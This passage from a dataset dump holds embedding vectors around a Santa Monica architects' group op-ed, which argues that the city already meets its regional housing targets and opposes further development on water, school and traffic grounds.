.06540212780237198,-0.018539803102612495,-0.024295566603541374,0.08592288196086884,0.02675369381904602,0.1112237349152565,0.01988408714532852,-0.0017154846573248506,2.089377842094267e-33,0.0455557256937027,0.051962923258543015,-0.03561720252037048,0.009282626211643219,0.020920030772686005,0.06323670595884323,0.13619360327720642,0.0747508704662323,-0.009738260880112648,0.05838790163397789,-0.016773901879787445,-0.036100830882787704,0.003674555802717805,0.08545193076133728,-0.055264826864004135,-0.03702560439705849,-0.01072106882929802,-0.09556423127651215,-0.0496450699865818,-0.08359795808792114,0.07267150282859802,-0.05397704616189003,0.019678782671689987,-0.018240487203001976,0.04557211697101593,-0.025633228942751884,-0.040635932236909866,0.020356057211756706,0.036833442747592926,0.04894715175032616,-0.05964390188455582,-0.06665010750293732,0.03109624981880188,-0.028082702308893204,0.06295082718133926,0.026780990883708,-0.016498517245054245,-0.07133977115154266,-0.007688878569751978,0.0866808071732521,-0.050648365169763565,-0.004530946724116802,-0.053417958319187164,-0.0695728063583374,-0.08039756119251251,0.008939462713897228,0.03959629684686661,0.01812490075826645,0.05315026268362999,-0.007942795753479004,-0.023824963718652725,-0.052950382232666016,0.01412278413772583,0.03477206081151962,-0.006612194236367941,-0.07005208730697632,-0.03485092148184776,0.020015351474285126,-0.03144076466560364,-0.024843361228704453,0.10334696620702744,-0.012472826987504959,-0.024823689833283424,-0.0194057859480381,-0.011762440204620361,0.0270223505795002,0.0478103831410408,-0.0073629277758300304,0.051678672432899475,-0.0012170936679467559,-0.03553791344165802,-0.007513661868870258,0.03283379226922989,-0.02206362597644329,0.0010589982848614454,0.026503566652536392,-0.06739798933267593,0.056915152817964554,-0.042593393474817276,-0.028648342937231064,0.025675829499959946,0.07460155338048935,-0.03279756009578705,0.04920066520571709,0.00710939709097147,-0.06495244055986404,-0.04946738854050636,-0.031411513686180115,0.044965192675590515,-0.02196521870791912,0.009566974826157093,-0.03909524902701378,0.030168673023581505,0.04520734027028084,0.03176527097821236,-2.112796077285547e-33,0.008703343570232391,-0.048676103353500366,0.029755428433418274,-0.018465792760252953,-0.06309990584850311,0.006822842638939619,0.045127395540475845,0.01321488805115223,-0.02270548976957798,-0.05221332609653473,-0.016125056892633438,0.010572804138064384,0.018952256068587303,-0.008512376807630062,-0.010553175583481789,0.0085678705945611,-0.06812752783298492,0.038971543312072754,0.0796012282371521,-0.054739635437726974,0.027121171355247498,0.0649511069059372,0.1043754294514656,-0.0329921655356884,0.07319961488246918,0.02993061952292919,0.08965825289487839,0.046688348054885864,0.01460416242480278,0.05206657573580742,-0.0741242840886116,-0.008621451444923878,0.09821765869855881,0.01861732453107834,-0.076327383518219,0.00565001554787159,-0.046249695122241974,-0.008781136944890022,0.017728229984641075,-0.07115081697702408,0.020577533170580864,0.013648174703121185,-0.03152597323060036,-0.002234287327155471,0.06326490640640259,-0.0871807187795639,-0.029304545372724533,0.008473943918943405,0.05830136686563492,-0.002424536505714059,-0.04919072240591049,-0.046060800552368164,-0.05284590274095535,0.033969633281230927,0.09890903532505035,-0.0002038595557678491,0.06095700338482857,-0.03228355571627617,-0.07094856351613998,0.05594909191131592,0.014790091663599014,0.02083304338157177,0.04224725067615509,-0.04935478791594505,0.025163834914565086,0.03460806980729103,0.05941910669207573,0.07524845004081726,0.019218048080801964,-0.0035434062592685223,-0.11386103928089142,0.026188109070062637,0.028025252744555473,-0.00706635694950819,0.017568469047546387,0.03174214065074921,-0.07231578975915909,0.06425999104976654,0.051945075392723083,0.043701790273189545,-0.07364407181739807,-0.07155214995145798,0.029737848788499832,0.04865049570798874,-0.046722039580345154,0.05466391518712044,0.008250972256064415,0.06212134286761284,0.03393763676285744,-0.05727248638868332,-0.008411339484155178,-0.049444813281297684,0.14678846299648285,0.12728019058704376,0.10088533163070679,-5.975809358460538e-8,-0.03524521365761757,0.07871856540441513,0.02073105052113533,0.01766711287200451,-0.10491380095481873,0.01632525399327278,0.04248930513858795,-0.08163722604513168,-0.038420066237449646,-0.06285138428211212,-0.06523510068655014,0.04757191240787506,-0.031217819079756737,0.02853744477033615,0.03152977302670479,0.11845508217811584,-0.05162821710109711,0.003606862621381879,0.01383177563548088,-0.053541116416454315,0.06644786149263382,-0.05906962603330612,0.053157251328229904,0.032493073493242264,-0.019590748474001884,0.019373120740056038,-0.07473732531070709,0.05797908827662468,-0.05489916354417801,-0.00321398233063519,-0.08144404739141464,-0.05401437357068062,0.010814126580953598,0.04651034623384476,-0.03503558784723282,-0.023134665563702583,-0.07109790295362473,-0.03138633444905281,0.0570363849401474,-0.008802458643913269,0.03934408724308014,0.039495982229709625,-0.08419789373874664,-0.02660241350531578,0.04543968662619591,0.04917801171541214,-0.02488674409687519,0.010362370871007442,-0.11627215147018433,0.01011101994663477,-0.012631461955606937,-0.014552329666912556,-0.016636241227388382,0.10782719403505325,0.06562291830778122,0.0581204816699028,-0.049815718084573746,-0.04707802087068558,0.018649373203516006,-0.018277542665600777,0.02770627848803997,-0.006472168490290642,-0.03716907277703285,0.003183071967214346],"string":"[\n 0.02063465118408203,\n -0.06913420557975769,\n -0.05849296599626541,\n -0.049131132662296295,\n 0.03298430144786835,\n 0.05633186921477318,\n -0.02295689657330513,\n 0.06953064352273941,\n 0.019625330343842506,\n 0.07997482270002365,\n 0.1488267332315445,\n 0.011776048690080643,\n -0.06638389080762863,\n -0.04077531769871712,\n -0.031046340242028236,\n 0.039383865892887115,\n 0.011340053752064705,\n -0.014869566075503826,\n 0.027558375149965286,\n 0.06567066162824631,\n 0.05491838976740837,\n -0.08908703923225403,\n 0.043323807418346405,\n -0.05810439959168434,\n -0.12425064295530319,\n 0.05506819859147072,\n 0.03093057870864868,\n 0.010261358693242073,\n -0.040969111025333405,\n -0.08424092829227448,\n 0.05945167317986488,\n -0.07815975695848465,\n 0.01946222223341465,\n -0.042271796613931656,\n 0.0028030932880938053,\n -0.09829040616750717,\n 0.04232429713010788,\n -0.0670858696103096,\n -0.057297367602586746,\n -0.09849663078784943,\n -0.015205996111035347,\n 0.01900499127805233,\n -0.01246968936175108,\n -0.020771177485585213,\n -0.013434706255793571,\n 0.04523554816842079,\n 0.03269270807504654,\n -0.029704539105296135,\n 0.08798080682754517,\n -0.03631860017776489,\n 0.04012148082256317,\n -0.06933946162462234,\n -0.0566670261323452,\n -0.05724816024303436,\n -0.05908459052443504,\n 0.055659811943769455,\n 0.009876804426312447,\n -0.015051616355776787,\n 0.047246143221855164,\n -0.0381757877767086,\n 0.15423645079135895,\n -0.02238861471414566,\n 0.030292829498648643,\n -0.021013328805565834,\n -0.07407550513744354,\n -0.06801024079322815,\n -0.008938002400100231,\n -0.013779625296592712,\n -0.03475109115242958,\n 0.003918464295566082,\n -0.007704264018684626,\n -0.045815374702215195,\n 0.0043779280968010426,\n -0.016389569267630577,\n 0.01695927418768406,\n 0.00931476429104805,\n 0.06569215655326843,\n 0.08901336789131165,\n 0.007341823074966669,\n 0.009714055806398392,\n 0.054647043347358704,\n 0.0458124577999115,\n -0.01971503719687462,\n 0.057498615235090256,\n 0.10573781281709671,\n -0.050109315663576126,\n -0.055846668779850006,\n 0.06116286665201187,\n 0.01808932051062584,\n -0.041510701179504395,\n 0.03422026336193085,\n -0.10190451145172119,\n 0.024585703387856483,\n -0.04808367043733597,\n 0.07178667932748795,\n -0.07333248853683472,\n -0.001554724178276956,\n -0.03794575855135918,\n -0.042586419731378555,\n 0.0039908867329359055,\n -0.03921502083539963,\n -0.03374609723687172,\n -0.007355363108217716,\n 0.04615369811654091,\n -0.04001346230506897,\n 0.026118766516447067,\n -0.044692881405353546,\n 0.01534250658005476,\n -0.057676609605550766,\n -0.0738292783498764,\n -0.04043672978878021,\n 0.0668136477470398,\n -0.02860534004867077,\n 0.04090325906872749,\n -0.014588465914130211,\n 0.01465545129030943,\n -0.05974086374044418,\n -0.02113526500761509,\n 0.04600954055786133,\n -0.06540212780237198,\n -0.018539803102612495,\n -0.024295566603541374,\n 0.08592288196086884,\n 0.02675369381904602,\n 0.1112237349152565,\n 0.01988408714532852,\n -0.0017154846573248506,\n 2.089377842094267e-33,\n 0.0455557256937027,\n 0.051962923258543015,\n -0.03561720252037048,\n 0.009282626211643219,\n 0.020920030772686005,\n 0.06323670595884323,\n 0.13619360327720642,\n 0.0747508704662323,\n -0.009738260880112648,\n 0.05838790163397789,\n -0.016773901879787445,\n -0.036100830882787704,\n 0.003674555802717805,\n 0.08545193076133728,\n -0.055264826864004135,\n -0.03702560439705849,\n -0.01072106882929802,\n -0.09556423127651215,\n -0.0496450699865818,\n -0.08359795808792114,\n 0.07267150282859802,\n -0.05397704616189003,\n 0.019678782671689987,\n -0.018240487203001976,\n 0.04557211697101593,\n -0.025633228942751884,\n -0.040635932236909866,\n 0.020356057211756706,\n 0.036833442747592926,\n 0.04894715175032616,\n -0.05964390188455582,\n -0.06665010750293732,\n 0.03109624981880188,\n -0.028082702308893204,\n 0.06295082718133926,\n 0.026780990883708,\n -0.016498517245054245,\n -0.07133977115154266,\n -0.007688878569751978,\n 0.0866808071732521,\n -0.050648365169763565,\n -0.004530946724116802,\n -0.053417958319187164,\n -0.0695728063583374,\n -0.08039756119251251,\n 0.008939462713897228,\n 0.03959629684686661,\n 0.01812490075826645,\n 0.05315026268362999,\n -0.007942795753479004,\n -0.023824963718652725,\n -0.052950382232666016,\n 0.01412278413772583,\n 0.03477206081151962,\n -0.006612194236367941,\n -0.07005208730697632,\n -0.03485092148184776,\n 0.020015351474285126,\n -0.03144076466560364,\n -0.024843361228704453,\n 0.10334696620702744,\n -0.012472826987504959,\n -0.024823689833283424,\n -0.0194057859480381,\n -0.011762440204620361,\n 0.0270223505795002,\n 0.0478103831410408,\n -0.0073629277758300304,\n 0.051678672432899475,\n -0.0012170936679467559,\n -0.03553791344165802,\n -0.007513661868870258,\n 0.03283379226922989,\n -0.02206362597644329,\n 0.0010589982848614454,\n 0.026503566652536392,\n -0.06739798933267593,\n 0.056915152817964554,\n -0.042593393474817276,\n -0.028648342937231064,\n 0.025675829499959946,\n 0.07460155338048935,\n -0.03279756009578705,\n 0.04920066520571709,\n 0.00710939709097147,\n -0.06495244055986404,\n -0.04946738854050636,\n -0.031411513686180115,\n 0.044965192675590515,\n -0.02196521870791912,\n 0.009566974826157093,\n -0.03909524902701378,\n 0.030168673023581505,\n 0.04520734027028084,\n 0.03176527097821236,\n -2.112796077285547e-33,\n 0.008703343570232391,\n -0.048676103353500366,\n 0.029755428433418274,\n -0.018465792760252953,\n -0.06309990584850311,\n 0.006822842638939619,\n 0.045127395540475845,\n 0.01321488805115223,\n -0.02270548976957798,\n -0.05221332609653473,\n -0.016125056892633438,\n 0.010572804138064384,\n 0.018952256068587303,\n -0.008512376807630062,\n -0.010553175583481789,\n 0.0085678705945611,\n -0.06812752783298492,\n 0.038971543312072754,\n 0.0796012282371521,\n -0.054739635437726974,\n 0.027121171355247498,\n 0.0649511069059372,\n 0.1043754294514656,\n -0.0329921655356884,\n 0.07319961488246918,\n 0.02993061952292919,\n 0.08965825289487839,\n 0.046688348054885864,\n 0.01460416242480278,\n 0.05206657573580742,\n -0.0741242840886116,\n -0.008621451444923878,\n 0.09821765869855881,\n 0.01861732453107834,\n -0.076327383518219,\n 0.00565001554787159,\n -0.046249695122241974,\n -0.008781136944890022,\n 0.017728229984641075,\n -0.07115081697702408,\n 0.020577533170580864,\n 0.013648174703121185,\n -0.03152597323060036,\n -0.002234287327155471,\n 0.06326490640640259,\n -0.0871807187795639,\n -0.029304545372724533,\n 0.008473943918943405,\n 0.05830136686563492,\n -0.002424536505714059,\n -0.04919072240591049,\n -0.046060800552368164,\n -0.05284590274095535,\n 0.033969633281230927,\n 0.09890903532505035,\n -0.0002038595557678491,\n 0.06095700338482857,\n -0.03228355571627617,\n -0.07094856351613998,\n 0.05594909191131592,\n 0.014790091663599014,\n 0.02083304338157177,\n 0.04224725067615509,\n -0.04935478791594505,\n 0.025163834914565086,\n 0.03460806980729103,\n 0.05941910669207573,\n 0.07524845004081726,\n 0.019218048080801964,\n -0.0035434062592685223,\n -0.11386103928089142,\n 0.026188109070062637,\n 0.028025252744555473,\n -0.00706635694950819,\n 0.017568469047546387,\n 0.03174214065074921,\n -0.07231578975915909,\n 0.06425999104976654,\n 0.051945075392723083,\n 0.043701790273189545,\n -0.07364407181739807,\n -0.07155214995145798,\n 0.029737848788499832,\n 0.04865049570798874,\n -0.046722039580345154,\n 0.05466391518712044,\n 0.008250972256064415,\n 0.06212134286761284,\n 0.03393763676285744,\n -0.05727248638868332,\n -0.008411339484155178,\n -0.049444813281297684,\n 0.14678846299648285,\n 0.12728019058704376,\n 0.10088533163070679,\n -5.975809358460538e-8,\n -0.03524521365761757,\n 0.07871856540441513,\n 0.02073105052113533,\n 0.01766711287200451,\n -0.10491380095481873,\n 0.01632525399327278,\n 0.04248930513858795,\n -0.08163722604513168,\n -0.038420066237449646,\n -0.06285138428211212,\n -0.06523510068655014,\n 0.04757191240787506,\n -0.031217819079756737,\n 0.02853744477033615,\n 0.03152977302670479,\n 0.11845508217811584,\n -0.05162821710109711,\n 0.003606862621381879,\n 0.01383177563548088,\n -0.053541116416454315,\n 0.06644786149263382,\n -0.05906962603330612,\n 0.053157251328229904,\n 0.032493073493242264,\n -0.019590748474001884,\n 0.019373120740056038,\n -0.07473732531070709,\n 0.05797908827662468,\n -0.05489916354417801,\n -0.00321398233063519,\n -0.08144404739141464,\n -0.05401437357068062,\n 0.010814126580953598,\n 0.04651034623384476,\n -0.03503558784723282,\n -0.023134665563702583,\n -0.07109790295362473,\n -0.03138633444905281,\n 0.0570363849401474,\n -0.008802458643913269,\n 0.03934408724308014,\n 0.039495982229709625,\n -0.08419789373874664,\n -0.02660241350531578,\n 0.04543968662619591,\n 0.04917801171541214,\n -0.02488674409687519,\n 0.010362370871007442,\n -0.11627215147018433,\n 0.01011101994663477,\n -0.012631461955606937,\n -0.014552329666912556,\n -0.016636241227388382,\n 0.10782719403505325,\n 0.06562291830778122,\n 0.0581204816699028,\n -0.049815718084573746,\n -0.04707802087068558,\n 0.018649373203516006,\n -0.018277542665600777,\n 0.02770627848803997,\n -0.006472168490290642,\n -0.03716907277703285,\n 0.003183071967214346\n]"}}},{"rowIdx":1289,"cells":{"text":{"kind":"string","value":"Santa Monica does not have a housing crisis. The Southern Counties Association of Governments (SCAG) target for our City is 239 new units per year. This is a fair number that reflects our percentage of growth for the Southern California region. In the last three years we have approved an average of 253 new units per year. In addition we have another 1929 units (not counting 679 units in withdrawn projects) in the pipeline at various stages of approval processing. If only half of those projects go to term over the next three years we would have approved an average of another 321 units in the next three years or 1/3 more than our SCAG requirement. Simply stated we are already meeting more than our fair share of the region’s housing demand in addition to all the other benefits our small city provides to the region. In fact, Santa Monica’s population increase (2000-2010), which we can see everyday in our traffic overload, was over twice that of Los Angeles County (6.7% vs 3.1%).\n\nWhile housing is very expensive in Santa Monica, as it is in all beach communities, our median incomes are 20-25% higher than LA County’s. Because of that, our city is actually more affordable to its residents than to the average citizen in LA County. For example, 56% of our property owners (1/4 of our population) pay more than 30% of their income for their housing, while 67% of the average Angelo homeowners pay that burden. Likewise 67% of our renters (3/4 of our population) pay that unreasonable burden, while 85% of Los Angeles County renters are similarly encumbered. Even though rent control is slowly being weakened, thanks primarily to our robust affordable housing program, which maintains 10-20% of the new units as deed restricted affordable units, affordability is still substantially protected in the future.\n\nIn a relatively wealthy city, we have made Santa Monica comparatively more affordable than Los Angeles County. And remember, this was done in the depths of a recession on some of the most expensive land on the Westside. The ability to maintain affordability of our housing stock through the combined efforts of the City Council and staff, of the Rent Control Board and of affordable housing providers like Community Corp and of affordability advocates like SMRR to name just a few, is an incredible achievement. We can all be proud of this achievement.\n\nIn short we can stop beating ourselves up about needing more and more housing and focus instead on the consequences of this abundant housing production, particularly as its burden escalates in the future. It is already colliding with our sustainability goals. We simply do not have the water for the 8,000 new residents who are to join us in the next 20 years. In fact we do not have enough water for our current homes and businesses since we import about a third of our water from collapsing sources such as the Sierra snow pack (the expected El Nino this year will not undo four years of drought). Most of the new housing is headed toward Downtown, which does not even have an elementary school, so those students will need to go across half the town to possibly McKinley. Only one in nine of our workers live and work in the City so we cannot substantially reduce our job/housing imbalance by building more housing, since 9 of the 10 new workers will still work outside of the City adding to our peak hour traffic crushes. And there is no certainty this ratio will likely improve with the advent of the light rail next year. It may actually get worse.\n\nThis housing production is not free. New residents require more schools, water, power, traffic upgrades, fire and police services. In countless ways this growth burdens our infrastructure which is already compromised and has limited expansion capability in a built out city. For example, where would you amass enough land for the next elementary school? Where would you build the desalinization plant when desalinization becomes a cost competitive (and ecologically sound) water source? Where would you move the City yards to when Memorial Park is expanded? These are not trivial problems when you consider, for example, that we have the least amount of open park space and are the second densest city in California for coastal cities of our comparable size. The limitations of space in our impacted City means that infrastructure upgrades become much more expensive and increase faster than the tax base to support them. Whenever our growth expands beyond our infrastructure’s capacity, in all senses of the word, all the residents end up paying a horrible civic price in cost (have you looked at your water bill lately), in time and in quality of life.\n\nUnfortunately the trumped-up housing supply crisis in our City has become a Trojan horse to try to drive more unsustainable development into our City. The poster boy for this is the recently approved Santa Monica Plaza project which the City Council green lighted to the next approval level with an astonishing 12 stories and a pitiful fig leaf of only 48 affordable units. The evolving Downtown Specific Plan is also freighted with an unsustainable amount of development.\n\nCities cannot and should not expand infinitely. Only so much land, sunlight and water is available to our City. For example cities actually do run out of water: even big ones like Sao Paolo, Brazil. So in our built-out beachside City we cannot sustainably produce all the housing there is demand for in our region, nor should we try, since we are already providing more than our fair share of housing AND other vital regional services: recreation (beaches), job creation (silicone beach), transportation (airport and light rail), entertainment (3rd Street Promenade, the pier), health (two regional hospitals), education (Santa Monica College) and tourism (hotel industry).\n\nThose other regional services are as equally regionally important as the housing we provide. However our most significant regional contribution is to be a low rise city where residents, visitors and tourists can relax and get relief from the urban pandemonium all around us. Relaxed living that’s our real mission statement in this region and this aligns with the interests of our residents.\n\nWhen we compare ourselves to other beachside Cities we do more than our share in many categories. How many regional hospitals does does Malibu have? Does Redondo Beach have a 30,000 student junior college? Does Manhattan Beach have an airport? We do housing very well, but it is just a small part of our metropolitan role. Sustainability of all our regional contributions without burdening our residents should be our major focus, not any one at the expense of the others.\n\nSMa.r.t. (Santa Monica Architects for a Responsible Tomorrow)\n\nAdvertisements"},"embedding":{"kind":"list like","value":[0.12709064781665802,-0.10071845352649689,0.01864900439977646,0.058949608355760574,0.0766684040427208,0.06796474009752274,-0.07053272426128387,-0.016001302748918533,-0.06915650516748428,-0.008887404575943947,0.011378215625882149,0.013229339383542538,0.03834369033575058,0.02478024736046791,0.1201261505484581,0.016548456624150276,-0.0255084540694952,-0.07658162713050842,0.03105318173766136,0.008144267834722996,0.04461139813065529,-0.02706937864422798,-0.054668448865413666,0.04855456203222275,0.05374279245734215,-0.018850548192858696,-0.042656101286411285,0.02976241335272789,-0.06937948614358902,0.012528662569820881,0.040017884224653244,0.0994947999715805,0.07254741340875626,-0.04331330209970474,0.11309471726417542,-0.05523693561553955,0.03696322813630104,0.021172216162085533,-0.05524516850709915,-0.03132449835538864,-0.03296692669391632,-0.0208145584911108,-0.020270731300115585,-0.018808534368872643,-0.1573721021413803,0.0033044840674847364,-0.0138793233782053,0.049229323863983154,0.02263074554502964,-0.01163498219102621,-0.0001379801396979019,0.05944088101387024,0.04784774407744408,-0.013414503075182438,-0.01877574436366558,0.06199810281395912,0.05682433769106865,-0.03373377397656441,-0.008452736772596836,-0.013788023963570595,-0.02480602078139782,-0.03827005252242088,-0.01262342743575573,-0.02064739540219307,0.0668577328324318,-0.006468839943408966,0.02037387154996395,-0.035386454313993454,-0.06452438980340958,0.026553582400083542,0.060602568089962006,-0.008214938454329967,0.017777005210518837,0.01834988035261631,0.07002577185630798,-0.0212965440005064,0.02109917625784874,0.05831463262438774,0.07759955525398254,-0.00048819719813764095,0.014997811987996101,-0.03992949053645134,-0.16281503438949585,-0.014217027463018894,-0.05153572931885719,0.011501168832182884,0.0171924140304327,-0.0025949408300220966,0.006111133377999067,0.06139346584677696,0.01712552271783352,0.020843738690018654,0.007591593079268932,-0.042717888951301575,0.05347113311290741,0.04778444021940231,-0.0647844448685646,-0.052728500217199326,-0.006852285470813513,0.002164097735658288,-0.013590713031589985,0.002124121878296137,0.07708609849214554,-0.11236430704593658,0.015476476401090622,-0.04315878078341484,-0.04924602434039116,0.014814394526183605,-0.05278673768043518,0.01104253251105547,0.0633263811469078,-0.05925731733441353,-0.014702496118843555,0.03468814119696617,-0.02372615411877632,0.02175891026854515,0.08446227014064789,-0.01720106042921543,-0.0336037315428257,0.02441529557108879,0.018015632405877113,0.030053751543164253,-0.07173758000135422,-0.010482006706297398,0.027021223679184914,0.008907523937523365,-0.08812768012285233,1.6082439635408738e-33,0.052491310983896255,0.053787704557180405,-0.035007670521736145,0.023323502391576767,-0.02188696898519993,-0.06995601207017899,0.037547677755355835,0.0837705135345459,0.019706839695572853,-0.03304443880915642,0.007094800937920809,0.03685840219259262,0.0531807579100132,0.05714584141969681,0.09917484223842621,-0.052054401487112045,-0.03240063786506653,-0.029430294409394264,-0.04330113157629967,-0.0036960600409656763,-0.028328441083431244,-0.05241827294230461,-0.022132225334644318,0.04933570697903633,-0.011695275083184242,-0.05822232365608215,0.0282225850969553,0.05956422910094261,-0.033425576984882355,0.0018450658535584807,0.03915311396121979,0.08309856802225113,0.09168626368045807,0.004878516774624586,0.014690871350467205,-0.02705109864473343,-0.010176991112530231,0.006374165881425142,-0.05560298636555672,0.015188775956630707,0.03015083447098732,0.0003247851273044944,0.021018942818045616,0.04586223140358925,0.05758567899465561,-0.01720191165804863,0.06565432250499725,-0.03386141359806061,-0.09992632269859314,0.06695003062486649,0.040300868451595306,0.04963643476366997,-0.09725736081600189,0.03342427313327789,-0.060849629342556,-0.045929260551929474,-0.0291526447981596,-0.02304341085255146,0.04373626410961151,-0.03907092660665512,-0.0696907639503479,-0.03783733397722244,0.03461536392569542,-0.027488766238093376,-0.01059438195079565,0.04223492741584778,0.08880523592233658,0.07669848948717117,0.038278497755527496,-0.02054818719625473,0.02697465941309929,-0.10444651544094086,0.004986981861293316,0.06085710600018501,0.06085385009646416,-0.017052939161658287,-0.021040644496679306,0.05986010655760765,0.05530872568488121,-0.0036832888144999743,-0.061801716685295105,0.055418699979782104,-0.02247014455497265,-0.000503294519148767,0.08652947098016739,-0.01964566670358181,0.049975261092185974,0.01861427165567875,-0.04899166151881218,-0.08327767997980118,-0.016054607927799225,-0.03337784856557846,0.05150831490755081,0.02552170492708683,0.0010788656072691083,-4.619483781142334e-33,-0.09331519156694412,-0.0070534260012209415,0.03049320913851261,0.006595270708203316,-0.06049300730228424,0.009671913459897041,0.03542627766728401,-0.08080253005027771,0.024250080808997154,-0.06466742604970932,-0.10611343383789062,-0.02937231957912445,0.12675295770168304,0.001358867040835321,-0.021476777270436287,-0.0027564819902181625,0.05900115147233009,-0.10425285249948502,-0.003096431028097868,-0.01780029758810997,-0.021704010665416718,0.0668322890996933,0.045693740248680115,0.05340533331036568,0.060835763812065125,-0.005198396742343903,-0.09128733724355698,0.010145781561732292,0.030954884365200996,-0.027467111125588417,-0.03325260803103447,-0.051425449550151825,-0.043889120221138,-0.012365888804197311,-0.02350621111690998,-0.01974458061158657,0.021091898903250694,-0.03669296205043793,-0.0499923937022686,0.07127311080694199,0.058487098664045334,-0.04699736833572388,0.015725521370768547,0.023225456476211548,-0.018781866878271103,-0.013900479301810265,0.01546924002468586,-0.06778214871883392,-0.005719227250665426,-0.02545933611690998,0.006213585380464792,0.04099034518003464,-0.11160651594400406,0.05669047310948372,0.015806764364242554,0.0025485639926046133,-0.0018470027716830373,0.03613679111003876,-0.1405763328075409,0.011997333727777004,-0.014247670769691467,0.08180851489305496,-0.07528449594974518,0.03502911329269409,0.01694159209728241,-0.08491650223731995,0.03515169769525528,-0.15830954909324646,0.009424944408237934,-0.07908269762992859,0.006799738854169846,-0.035328835248947144,-0.041981104761362076,0.038461387157440186,-0.10420259833335876,-0.017562013119459152,-0.0088794631883502,0.034634191542863846,-0.0300820991396904,0.023450817912817,-0.039408985525369644,-0.0019456581212580204,-0.054121069610118866,-0.016328779980540276,0.02656913921236992,0.005427177995443344,-0.04333554580807686,-0.10011330991983414,-0.012565524317324162,0.07163707166910172,-0.11632488667964935,0.04412633553147316,-0.10056707262992859,-0.012991014868021011,0.03584301844239235,-5.462618091200966e-8,0.1578119397163391,0.08608002960681915,-0.015988240018486977,0.002663110848516226,0.08371765911579132,-0.030200647190213203,-0.012018095701932907,0.08298780024051666,0.016450146213173866,0.037072811275720596,0.06675666570663452,0.005141387693583965,0.011966004967689514,0.014865562319755554,-0.08733643591403961,0.037277959287166595,-0.019029762595891953,0.02250937931239605,-0.0590391643345356,-0.08212890475988388,0.012846134603023529,0.0012687243288382888,-0.03958570957183838,0.06060517579317093,-0.02501239813864231,-0.00041651498759165406,-0.03326534107327461,0.05217009782791138,0.0055720009841024876,-0.001151585252955556,-0.040438562631607056,-0.059942614287137985,-0.03227528929710388,-0.055547211319208145,0.03104523755609989,-0.016031477600336075,0.018860630691051483,-0.03993814066052437,0.037565845996141434,0.0680924504995346,0.07361295819282532,-0.024647196754813194,-0.07813792675733566,0.0030967958737164736,-0.05944373086094856,-0.07847662270069122,-0.10847090184688568,-0.015039355494081974,0.01321864128112793,-0.0014022665563970804,0.006690610200166702,-0.008802696131169796,-0.088969886302948,0.10581537336111069,0.04515751451253891,-0.06927891820669174,-0.039920054376125336,-0.06674444675445557,0.009802632965147495,0.04624378681182861,0.0010129096917808056,-0.0016703647561371326,-0.040734704583883286,0.027327274903655052],"string":"[\n 0.12709064781665802,\n -0.10071845352649689,\n 0.01864900439977646,\n 0.058949608355760574,\n 0.0766684040427208,\n 0.06796474009752274,\n -0.07053272426128387,\n -0.016001302748918533,\n -0.06915650516748428,\n -0.008887404575943947,\n 0.011378215625882149,\n 0.013229339383542538,\n 0.03834369033575058,\n 0.02478024736046791,\n 0.1201261505484581,\n 0.016548456624150276,\n -0.0255084540694952,\n -0.07658162713050842,\n 0.03105318173766136,\n 0.008144267834722996,\n 0.04461139813065529,\n -0.02706937864422798,\n -0.054668448865413666,\n 0.04855456203222275,\n 0.05374279245734215,\n -0.018850548192858696,\n -0.042656101286411285,\n 0.02976241335272789,\n -0.06937948614358902,\n 0.012528662569820881,\n 0.040017884224653244,\n 0.0994947999715805,\n 0.07254741340875626,\n -0.04331330209970474,\n 0.11309471726417542,\n -0.05523693561553955,\n 0.03696322813630104,\n 0.021172216162085533,\n -0.05524516850709915,\n -0.03132449835538864,\n -0.03296692669391632,\n -0.0208145584911108,\n -0.020270731300115585,\n -0.018808534368872643,\n -0.1573721021413803,\n 0.0033044840674847364,\n -0.0138793233782053,\n 0.049229323863983154,\n 0.02263074554502964,\n -0.01163498219102621,\n -0.0001379801396979019,\n 0.05944088101387024,\n 0.04784774407744408,\n -0.013414503075182438,\n -0.01877574436366558,\n 0.06199810281395912,\n 0.05682433769106865,\n -0.03373377397656441,\n -0.008452736772596836,\n -0.013788023963570595,\n -0.02480602078139782,\n -0.03827005252242088,\n -0.01262342743575573,\n -0.02064739540219307,\n 0.0668577328324318,\n -0.006468839943408966,\n 0.02037387154996395,\n -0.035386454313993454,\n -0.06452438980340958,\n 0.026553582400083542,\n 0.060602568089962006,\n -0.008214938454329967,\n 0.017777005210518837,\n 0.01834988035261631,\n 0.07002577185630798,\n -0.0212965440005064,\n 0.02109917625784874,\n 0.05831463262438774,\n 0.07759955525398254,\n -0.00048819719813764095,\n 0.014997811987996101,\n -0.03992949053645134,\n -0.16281503438949585,\n -0.014217027463018894,\n -0.05153572931885719,\n 0.011501168832182884,\n 0.0171924140304327,\n -0.0025949408300220966,\n 0.006111133377999067,\n 0.06139346584677696,\n 0.01712552271783352,\n 0.020843738690018654,\n 0.007591593079268932,\n -0.042717888951301575,\n 0.05347113311290741,\n 0.04778444021940231,\n -0.0647844448685646,\n -0.052728500217199326,\n -0.006852285470813513,\n 0.002164097735658288,\n -0.013590713031589985,\n 0.002124121878296137,\n 0.07708609849214554,\n -0.11236430704593658,\n 0.015476476401090622,\n -0.04315878078341484,\n -0.04924602434039116,\n 0.014814394526183605,\n -0.05278673768043518,\n 0.01104253251105547,\n 0.0633263811469078,\n -0.05925731733441353,\n -0.014702496118843555,\n 0.03468814119696617,\n -0.02372615411877632,\n 0.02175891026854515,\n 0.08446227014064789,\n -0.01720106042921543,\n -0.0336037315428257,\n 0.02441529557108879,\n 0.018015632405877113,\n 0.030053751543164253,\n -0.07173758000135422,\n -0.010482006706297398,\n 0.027021223679184914,\n 0.008907523937523365,\n -0.08812768012285233,\n 1.6082439635408738e-33,\n 0.052491310983896255,\n 0.053787704557180405,\n -0.035007670521736145,\n 0.023323502391576767,\n -0.02188696898519993,\n -0.06995601207017899,\n 0.037547677755355835,\n 0.0837705135345459,\n 0.019706839695572853,\n -0.03304443880915642,\n 0.007094800937920809,\n 0.03685840219259262,\n 0.0531807579100132,\n 0.05714584141969681,\n 0.09917484223842621,\n -0.052054401487112045,\n -0.03240063786506653,\n -0.029430294409394264,\n -0.04330113157629967,\n -0.0036960600409656763,\n -0.028328441083431244,\n -0.05241827294230461,\n -0.022132225334644318,\n 0.04933570697903633,\n -0.011695275083184242,\n -0.05822232365608215,\n 0.0282225850969553,\n 0.05956422910094261,\n -0.033425576984882355,\n 0.0018450658535584807,\n 0.03915311396121979,\n 0.08309856802225113,\n 0.09168626368045807,\n 0.004878516774624586,\n 0.014690871350467205,\n -0.02705109864473343,\n -0.010176991112530231,\n 0.006374165881425142,\n -0.05560298636555672,\n 0.015188775956630707,\n 0.03015083447098732,\n 0.0003247851273044944,\n 0.021018942818045616,\n 0.04586223140358925,\n 